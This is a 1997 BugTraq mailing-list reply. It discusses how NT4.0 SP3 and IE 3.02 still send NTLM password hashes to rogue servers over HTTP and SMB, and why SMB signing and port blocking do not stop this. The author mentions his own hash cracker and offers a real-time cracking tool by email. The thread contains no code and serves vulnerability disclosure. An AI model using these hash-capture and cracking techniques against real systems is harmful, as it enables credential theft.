Re: NT4.0 SP3 Still vulnerable

[pokee () MAXWELL EE WASHINGTON EDU (Aaron Spangler)]

> From: "Rubens Kuhl Jr." <rkuhljr () pueridomus br>
> To: "Aaron Spangler" <pokee () MAXWELL EE WASHINGTON EDU>, <BUGTRAQ () NETSPACE ORG>
> Subject: Re: NT4.0 SP3 Still vulnerable
> Date: Thu, 15 May 1997 22:15:43 -0300
>
> As far as I know, IE 3.02 corrected only sending NTLM logins thru HTTP
> connections, and I suppose you are talking about capturing
> username/password hashes sent via SMB/CIFS (file://aaa.bbb.ccc.ddd).

I have a second site setup to grab usernames/password hashes via NTLM over
HTTP.   IE 3.02 is STILL NOT IMMUNE TO THIS.   (Paul Ashton's Bug)

> I'm still downloading SP3, but after a look at the readme it looked me that
> SP3 could empower a administrator to fix such bug by enabling the SMB
> signing feature; it would not fix it at installation.

Not True, Take a look at

 ftp://ftp.microsoft.com/developr/drg/CIFS/CIFS-Auth.doc

Even Message Signing does NOT help in this case.  The client still sends
the password before message signing starts.  This is because the Password
is the "Key" used for message signing!  Rogue servers can still grab
password hashes the same old way!

> And with or without SP3, filtering routers blocking 135/137/138/139 ports
> make this exploit and similar ones limited to Intranets.

Even if you block ports 135/137/138/139, NTLM of HTTP is STILL VULNERABLE
because it is over port 80!  (the HTTP port)


> Hasn't one exploit code been released to SAMBA-DIGEST ? It captures the
> password hashes, which someone could pass to l0phtcrack and similar
> crackers.

It might be.  I have not read it yet.  Although one important thing to note
that in order to use l0phtcrack or NTcrack or Crack50-NT, one needs to
modify the code because the password grabbed from NTML over HTTP or the
password grabbed from SMB (CIFS) is DOUBLY encrypted.  Although I have
written a cracker which I suspect is similiar to Crack50-NT's speed because
I have some speedups of having to do only one Crypt and then a table lookup
to break most of the doubly encrypted LM hash.

> Other exploits such as real-time password cracking hasn't been released,
> but I'm not sure if such release would make Microsoft go faster.

I do have one, but I am not going to post the URL, or my web server will be
overloaded.  If anyone is interested in this, send me email and I will
give you the URL.

> I think that's why BugTraq exists.
>
> Rubens Kuhl Jr.

What would we do without BugTraq?

Thanks,

- Aaron

--
Aaron Spangler                 EE Unix System Administrator
Electrical Engineering FT-10        pokee () ee washington edu
University of Washington            Phone    (206) 543-8984
Box 352500                             or    (206) 543-2523
Seattle, WA 98195-2500              Fax      (206) 543-3842